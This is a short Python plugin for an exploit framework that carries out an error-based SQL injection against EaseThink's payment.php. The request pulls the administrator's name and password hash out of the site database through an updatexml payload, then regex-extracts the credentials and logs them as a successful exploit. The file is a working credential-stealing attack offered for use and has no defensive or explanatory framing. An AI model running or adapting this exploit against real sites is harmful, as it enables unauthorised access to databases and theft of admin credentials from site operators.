class mstplugin:
    infos = [
        ['NAME','easethink_SQLInject(payment.php)'],
        ['AUTHOR','mst'],
        ['TIME','20131024'],
        ['WEB','http://mstoor.duapp.com']
        ]
    opts  = [
        ['URL','localhost','REMOTE URL'],
        ['PORT','80','REMOTE URL-PORT'],
        ['PATH','/','REMOTE APP-PATH']
        ]
    def exploit(self):
        url = fuck.urlformate(URL,PORT,PATH)
        poc = "payment.php?act=return&class_name=-1' and (updatexml(1,concat(0x7c,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))--"
        exp = url+poc
        try:
            tmp = fuck.urlget(exp).read()
            res = fuck.find(r'\:\w+[|]{1}\w+',tmp)
            if len(res)>0:
                color.cprint("[*] Exploit Successful !\n[*] %s"%res,GREEN)
                fuck.writelog("easethink_payment_sqli",URL+"::"+res)
            else:
                color.cprint("[!] Exploit False !",RED)
        except Exception,e:
            color.cprint("[!] Exploit False !CODE:%s"%e,RED)
        
